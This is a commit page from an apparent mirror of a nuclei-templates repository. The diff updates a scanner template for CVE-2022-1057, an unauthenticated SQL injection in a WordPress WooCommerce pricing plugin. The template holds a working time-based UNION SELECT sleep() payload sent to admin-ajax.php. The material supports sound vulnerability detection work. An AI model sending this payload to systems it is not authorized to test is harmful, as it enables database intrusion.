daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update CVE-2022-1057.yaml

patch-1
Ritik Chaddha 2022-10-23 10:08:40 +05:30 committed by GitHub
parent af7f60c205
commit 6995314028
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 7 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

13
cves/2022/CVE-2022-1057.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2022-1057
info:
name: Pricing Deals for WooCommerce < 2.0.3 - Unauthenticated SQLi
name: Pricing Deals for WooCommerce < 2.0.3 - Unauthenticated SQL Injection
author: theamanrawat
severity: critical
description: |
@ -14,18 +14,19 @@ info:
cve-id: CVE-2022-1057
metadata:
verified: true
tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,pricing-deals-for-woocommerce,uauth
tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,pricing-deals-for-woocommerce,unauth
requests:
- raw:
- |
@timeout: 15s
GET /wp-admin/admin-ajax.php?action=vtprd_product_search_ajax&term=aaa%27+union+select+1,sleep(5),3--+- HTTP/1.1
GET /wp-admin/admin-ajax.php?action=vtprd_product_search_ajax&term=aaa%27+union+select+1,sleep(6),3--+- HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'duration>=5'
- 'status_code == 500'
- 'duration>=6'
- 'status_code == 500'
- 'contains(body, "been a critical error")'
condition: and